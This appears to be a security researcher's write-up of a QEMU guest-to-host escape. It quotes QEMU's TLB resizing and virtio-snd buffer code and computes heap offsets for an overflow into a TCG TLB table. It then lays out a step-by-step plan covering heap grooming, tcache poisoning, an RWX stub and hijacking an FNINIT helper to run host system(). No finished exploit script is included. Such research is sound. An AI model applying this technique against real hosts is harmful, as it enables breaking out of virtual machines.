rate = desc->window_max_entries * 100 / old_size;
if (rate > 70) {
new_size = MIN(old_size << 1, 1 << CPU_TLB_DYN_MAX_BITS);
} else if (rate < 30 && window_expired) {
size_t ceil = pow2ceil(desc->window_max_entries);
size_t expected_rate = desc->window_max_entries * 100 / ceil;
13 collapsed lines
/*
* Avoid undersizing when the max number of entries seen is just below
* a pow2. For instance, if max_entries == 1025, the expected use rate
* would be 1025/2048==50%. However, if max_entries == 1023, we'd get
* 1023/1024==99.9% use rate, so we'd likely end up doubling the size
* later. Thus, make sure that the expected use rate remains below 70%.
* (and since we double the size, that means the lowest rate we'd
* expect to get is 35%, which is still in the 30-70% range where
* we consider that the size is appropriate.)
*/
if (expected_rate > 70) {
ceil *= 2;
}
new_size = MAX(ceil, 1 << CPU_TLB_DYN_MIN_BITS);
}
if (new_size == old_size) {
if (window_expired) {
tlb_window_reset(desc, now, desc->n_used_entries);
}
return;
}
g_free(fast->table);
g_free(desc->fulltlb);
tlb_window_reset(desc, now, 0);
/* desc->n_used_entries is cleared by the caller */
fast->mask = (new_size - 1) << CPU_TLB_ENTRY_BITS;
fast->table = g_try_new(CPUTLBEntry, new_size);
desc->fulltlb = g_try_new(CPUTLBEntryFull, new_size);
/*
19 collapsed lines
* If the allocations fail, try smaller sizes. We just freed some
* memory, so going back to half of new_size has a good chance of working.
* Increased memory pressure elsewhere in the system might cause the
* allocations to fail though, so we progressively reduce the allocation
* size, aborting if we cannot even allocate the smallest TLB we support.
*/
while (fast->table == NULL || desc->fulltlb == NULL) {
if (new_size == (1 << CPU_TLB_DYN_MIN_BITS)) {
error_report("%s: %s", __func__, strerror(errno));
abort();
}
new_size = MAX(new_size >> 1, 1 << CPU_TLB_DYN_MIN_BITS);
fast->mask = (new_size - 1) << CPU_TLB_ENTRY_BITS;
g_free(fast->table);
g_free(desc->fulltlb);
fast->table = g_try_new(CPUTLBEntry, new_size);
desc->fulltlb = g_try_new(CPUTLBEntryFull, new_size);
}
}

So by touching many guest pages, we can make the table grow. This raises desc->n_used_entries and therefore window_max_entries; once the used-entry rate crosses 70%, QEMU doubles the table. Later, after the target 0x810 RX hole has been freed, we do the opposite: touch only one or a few pages, trigger a flush, wait for the 100 ms resize window to expire, and trigger another flush. At that point window_max_entries is tiny relative to the old table, so rate < 30 and QEMU shrinks to MAX(pow2ceil(window_max_entries), 1 << CPU_TLB_DYN_MIN_BITS). With one useful entry, that is the minimum fast table: 64 entries.

64 * sizeof(CPUTLBEntry)
64 * 0x20 = 0x800-byte allocation
glibc chunk size = 0x810

First of all a note on our virtio-snd primtives, we have:

include/hw/audio/virtio-snd.h
16 collapsed lines
/*
* VirtIOSoundPCMBuffer has a dynamic size since it includes the raw PCM data
* in its allocation. It must be initialized and destroyed as follows:
*
* size_t size = [[derived from owned VQ element descriptor sizes]];
* buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size);
* buffer->elem = [[owned VQ element]];
*
* [..]
*
* g_free(buffer->elem);
* g_free(buffer);
*/
struct VirtIOSoundPCMBuffer {
QSIMPLEQ_ENTRY(VirtIOSoundPCMBuffer) entry;
VirtQueueElement *elem;
VirtQueue *vq;
size_t size;
/*
* In TX / Plaback, `offset` represents the first unused position inside
* `data`. If `offset == size` then there are no unused data left.
*/
uint64_t offset;
/* Used for the TX queue for lazy I/O copy from `elem` */
4 collapsed lines
bool populated;
/*
* VirtIOSoundPCMBuffer is an unsized type because it ends with an array of
* bytes. The size of `data` is determined from the I/O message's read-only
* or write-only size when allocating VirtIOSoundPCMBuffer.
*/
uint8_t data[];
};

On the target build, data[] starts at offset 0x29, and sizeof(VirtIOSoundPCMBuffer) rounds to 0x30.

We have two ways to allocate within the driver:

hw/audio/virtio-snd.c
/*
* The rx virtqueue handler. Makes the buffers available to their respective
* streams for consumption.
*
* @vdev: VirtIOSound device
* @vq: rx virtqueue
*/
static void virtio_snd_handle_rx_xfer(VirtIODevice *vdev, VirtQueue *vq)
{
44 collapsed lines
VirtIOSound *vsnd = VIRTIO_SND(vdev);
VirtIOSoundPCMBuffer *buffer;
VirtQueueElement *elem;
size_t msg_sz, size;
virtio_snd_pcm_xfer hdr;
uint32_t stream_id;
/*
* if any of the I/O messages are invalid, put them in vsnd->invalid and
* return them after the for loop.
*/
bool must_empty_invalid_queue = false;
if (!virtio_queue_ready(vq)) {
return;
}
trace_virtio_snd_handle_rx_xfer();
for (;;) {
VirtIOSoundPCMStream *stream;
elem = virtqueue_pop(vq, sizeof(VirtQueueElement));
if (!elem) {
break;
}
/* get the message hdr object */
msg_sz = iov_to_buf(elem->out_sg,
elem->out_num,
0,
&hdr,
sizeof(virtio_snd_pcm_xfer));
if (msg_sz != sizeof(virtio_snd_pcm_xfer)) {
goto rx_err;
}
stream_id = le32_to_cpu(hdr.stream_id);
if (stream_id >= vsnd->snd_conf.streams
|| !vsnd->pcm.streams[stream_id]) {
goto rx_err;
}
stream = vsnd->pcm.streams[stream_id];
if (stream == NULL || stream->info.direction != VIRTIO_SND_D_INPUT) {
goto rx_err;
}
WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {
size = iov_size(elem->in_sg, elem->in_num) -
sizeof(virtio_snd_pcm_status);
buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size);
buffer->elem = elem;
buffer->vq = vq;
buffer->size = 0;
buffer->offset = 0;
QSIMPLEQ_INSERT_TAIL(&stream->queue, buffer, entry);
}
continue;
11 collapsed lines
rx_err:
must_empty_invalid_queue = true;
buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer));
buffer->elem = elem;
buffer->vq = vq;
QSIMPLEQ_INSERT_TAIL(&vsnd->invalid, buffer, entry);
}
if (must_empty_invalid_queue) {
empty_invalid_queue(vdev, vq);
}
}

With size 0x30 + (in_len - 0x8) = in_len + 0x28, and:

hw/audio/virtio-snd.c
/*
* The tx virtqueue handler. Makes the buffers available to their respective
* streams for consumption.
*
* @vdev: VirtIOSound device
* @vq: tx virtqueue
*/
static void virtio_snd_handle_tx_xfer(VirtIODevice *vdev, VirtQueue *vq)
{
48 collapsed lines
VirtIOSound *vsnd = VIRTIO_SND(vdev);
VirtIOSoundPCMBuffer *buffer;
VirtQueueElement *elem;
size_t msg_sz, size;
virtio_snd_pcm_xfer hdr;
uint32_t stream_id;
/*
* If any of the I/O messages are invalid, put them in vsnd->invalid and
* return them after the for loop.
*/
bool must_empty_invalid_queue = false;
if (!virtio_queue_ready(vq)) {
return;
}
trace_virtio_snd_handle_tx_xfer();
for (;;) {
VirtIOSoundPCMStream *stream;
elem = virtqueue_pop(vq, sizeof(VirtQueueElement));
if (!elem) {
break;
}
/* get the message hdr object */
msg_sz = iov_to_buf(elem->out_sg,
elem->out_num,
0,
&hdr,
sizeof(virtio_snd_pcm_xfer));
if (msg_sz != sizeof(virtio_snd_pcm_xfer)) {
goto tx_err;
}
stream_id = le32_to_cpu(hdr.stream_id);
if (stream_id >= vsnd->snd_conf.streams
|| vsnd->pcm.streams[stream_id] == NULL) {
goto tx_err;
}
stream = vsnd->pcm.streams[stream_id];
if (stream->info.direction != VIRTIO_SND_D_OUTPUT) {
goto tx_err;
}
WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {
size = iov_size(elem->out_sg, elem->out_num) - msg_sz;
buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size);
buffer->elem = elem;
buffer->populated = false;
buffer->vq = vq;
buffer->size = size;
buffer->offset = 0;
stream->latency_bytes += size;
16 collapsed lines
QSIMPLEQ_INSERT_TAIL(&stream->queue, buffer, entry);
}
continue;
tx_err:
must_empty_invalid_queue = true;
buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer));
buffer->elem = elem;
buffer->vq = vq;
QSIMPLEQ_INSERT_TAIL(&vsnd->invalid, buffer, entry);
}
if (must_empty_invalid_queue) {
empty_invalid_queue(vdev, vq);
}
}

With size 0x30 + data_len

Important is the size 0x410, since it makes the RX overflow land exactly on the fields we want in the next allocation. The vulnerable source is an RX buffer with in_len = 0x3d8:

RX data size = in_len - sizeof(virtio_snd_pcm_status)
= 0x3d8 - 0x8
= 0x3d0
QEMU request = sizeof(VirtIOSoundPCMBuffer) + 0x3d0
= 0x30 + 0x3d0
= 0x400
glibc chunk = request2size(0x400)
= 0x410

The source stream’s period_bytes is 0x3f7, while buffer->data starts at offset 0x29. So the buggy audio write reaches:

0x29 + 0x3f7 = 0x420 bytes from the source user pointer

The next chunk’s user pointer starts at 0x410, so the overflow reaches:

0x420 - 0x410 = 0x10 bytes into the next allocation

That is exactly two qwords: CPUTLBEntry.addr_read and CPUTLBEntry.addr_write, and we can reuse the 0x410 for the tcache It’s also the last default small tcache size:

idx = (0x410 - 0x20) / 0x10 = 0x3f

So we can reuse that for the a/b write as well.

Exploit

Combining this (and a bit of heap grooming), we can achieve something like:

  1. Spray some 0x810 chunks with live virtio-snd TX filler buffers (fill810, TX_HOLE_FILLER_DATA_LEN = 0x7d0).

  2. Spray some 0x410 chunks with live virtio-snd TX guard buffers (guard410, TX_SMALL_FILLER_DATA_LEN = 0x3d0).

  3. Grow user-mode TLB table The idea is to shrink the TLB table later so it occupies a 0x810 chunk

  4. Queue RX source/target pairs. [source RX buffer: 0x410 live] [target RX buffer: 0x810]

  5. Free only the target-side 0x810 chunk(s), this is possible because of the different streams we can only free this target. [source RX buffer: 0x410 live] [target 0x810 chunk: free]

  6. Shrink the TCG TLB so CPUTLBEntry[64] reclaims a freed 0x810 target hole. [source RX buffer: 0x410 live] [0x810 chunk: TLB table]

  7. Overflow from the live 0x410 source into CPUTLBEntry[0].

  8. Use guest NULL as a host heap page window.

    We can probe this a bit by capturing segfaults from the guest to see if it succeeded. Also, this first page immediately gives us a text and TCG code-cache rwx leak

  9. Edit tcache metadata in that page.

    For arbitrary write, we need a bit more, so we find the tcache_perthread_struct, which in this page and write a pointer into the tcache->entries[0x3f] and use the 0x410 allocation

  10. Use TX allocations as targeted host writes.

  11. Write an RWX system stub and overwrite helper_info_fninit.func.

  12. Guest executes FNINIT1 -> helper_info_fninit.func -> rwx region -> system

We can actually stablize this all a bit by using i.e. multiple targets, so multiple holes where the TLB table might get allocated.

Escape V2

Coming soon.